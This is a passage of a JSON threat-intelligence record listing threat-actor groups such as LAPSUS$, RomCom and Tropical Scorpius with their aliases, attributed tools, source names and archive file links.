			"aliases": [
				"Lapsus",
				"LAPSUS$",
				"DEV-0537",
				"SLIPPY SPIDER",
				"Strawberry Tempest",
				"UNC3661"
			],
			"source_name": "MISPGALAXY:LAPSUS",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "fecc0d5a-3654-425d-9290-b6d0b4105463",
			"created_at": "2023-10-17T02:00:08.330061Z",
			"updated_at": "2026-04-10T02:00:03.37711Z",
			"deleted_at": null,
			"main_name": "Void Rabisu",
			"aliases": [
				"Tropical Scorpius"
			],
			"source_name": "MISPGALAXY:Void Rabisu",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "555e2cac-931d-4ad4-8eaa-64df6451059d",
			"created_at": "2023-01-06T13:46:39.48103Z",
			"updated_at": "2026-04-10T02:00:03.342729Z",
			"deleted_at": null,
			"main_name": "RomCom",
			"aliases": [
				"UAT-5647",
				"Storm-0978"
			],
			"source_name": "MISPGALAXY:RomCom",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d58052ba-978b-4775-985a-26ed8e64f98c",
			"created_at": "2023-09-07T02:02:48.069895Z",
			"updated_at": "2026-04-10T02:00:04.946879Z",
			"deleted_at": null,
			"main_name": "Tropical Scorpius",
			"aliases": [
				"DEV-0978",
				"RomCom",
				"Storm-0671",
				"Storm-0978",
				"TA829",
				"Tropical Scorpius",
				"UAC-0180",
				"UNC2596",
				"Void Rabisu"
			],
			"source_name": "ETDA:Tropical Scorpius",
			"tools": [
				"COLDDRAW",
				"Cuba",
				"Industrial Spy",
				"PEAPOD",
				"ROMCOM",
				"ROMCOM RAT",
				"SingleCamper",
				"SnipBot"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "4f56bb34-098d-43f6-a0e8-99616116c3ea",
			"created_at": "2024-06-19T02:03:08.048835Z",
			"updated_at": "2026-04-10T02:00:03.870819Z",
			"deleted_at": null,
			"main_name": "GOLD FLAMINGO",
			"aliases": [
				"REF9019",
				"Tropical Scorpius",
				"UAC-0132",
				"UAC0132",
				"UNC2596",
				"Void Rabisu"
			],
			"source_name": "Secureworks:GOLD FLAMINGO",
			"tools": [
				"Chanitor",
				"Cobalt Strike",
				"Cuba",
				"Meterpreter",
				"Mimikatz",
				"ROMCOM RAT"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434603,
	"ts_updated_at": 1775791708,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e6f76326307511f14dd12cd4e709a376bf191b6e.pdf",
		"text": "https://archive.orkl.eu/e6f76326307511f14dd12cd4e709a376bf191b6e.txt",
		"img": "https://archive.orkl.eu/e6f76326307511f14dd12cd4e709a376bf191b6e.jpg"
	}
}